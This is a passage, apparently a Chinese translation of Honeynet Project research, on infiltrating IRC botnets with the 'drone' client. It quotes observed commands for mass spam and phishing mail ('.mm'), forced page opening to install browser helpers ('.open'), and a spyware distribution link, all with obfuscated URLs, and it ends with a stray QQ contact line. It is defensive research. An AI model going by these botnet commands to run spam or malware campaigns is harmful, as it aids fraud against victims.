关于这些指令实现的进一步信息,可以在这找到,以僵尸工具源码的注释形式给出。在 drone -一个由德国蜜网项目组开发的自定制 IRC 客户端的帮助下,通过利用我们的蜜网所捕获的网络连接数据将 drone 混入僵尸网络中,我们可以对僵尸网络如何被用以进行发送垃圾邮件 / 钓鱼邮件进行更深入的了解。以下将给出一些观察到的典型活动案例。
实例 1
在一个特定的僵尸网络中,我们观察到攻击者发出了以下指令(注意 URL 都已经被混淆了):
| <St0n3y> .mm http://www.example.com/email/fetch.php? 4a 005aec5d7dbe3b 01c 75aab2b 1c 9991 http://www.foobar.net/pay.html Joe did_u_send_me_this |
.mm (mass emailing) 指令是一个一般化的 spam_start 指令的定制版本。这个指令接收以下 4 个参数:
一个包含多个 Email 地址文件的 URL
包含在垃圾邮件中的目标网站地址链接-这个网站可能是一个普遍的垃圾网页,也可能是一个钓鱼网站
发送者的名字
邮件的主题
在本次攻击案例中,每次调用 fetch.php 脚本会返回 30 个不同的 Email 地址。对于每个收信者,将会构造一个 Email 邮件,将宣传指令中第二个参数给出的链接。在这个实例中,第二个参数的链接指向了一个企图在受害者主机上安装一个恶意 ActiveX 组件的网页。
实例 2
在另一个僵尸网络中,我们观察到在受害者 PC 上安装浏览器助手组件的攻击方式:
[TOPIC] # spam 9 :.open http://amateur.example.com/l33tag3/beta.html -s
.open 指令告诉每个僵尸工具打开所申请的网页并显示给受害者,在这个案例中,这个网页中包含一个浏览器助手组件,企图在受害者主机上安装自身。从这个 IRC 频道的名称可以显示出,这个僵尸网络也是用以发送垃圾邮件的。
实例 3
在另外一个僵尸网络上,我们观察到 spyware 传播的实例:
http://public.example.com/prompt.php?h=6d799fbeef 3a 9b 386587f 5f 7b 37f [...]
这个链接在对捕获到的恶意软件的分析中获得,它将受害者指向了一个提供“免费的广告传播软件”的公司的网页,这个网站包含了在企图访问客户端上安装 ActiveX 组件(推测是 adware 或 spyware )的多个页面。
;QQ联络:1360095750。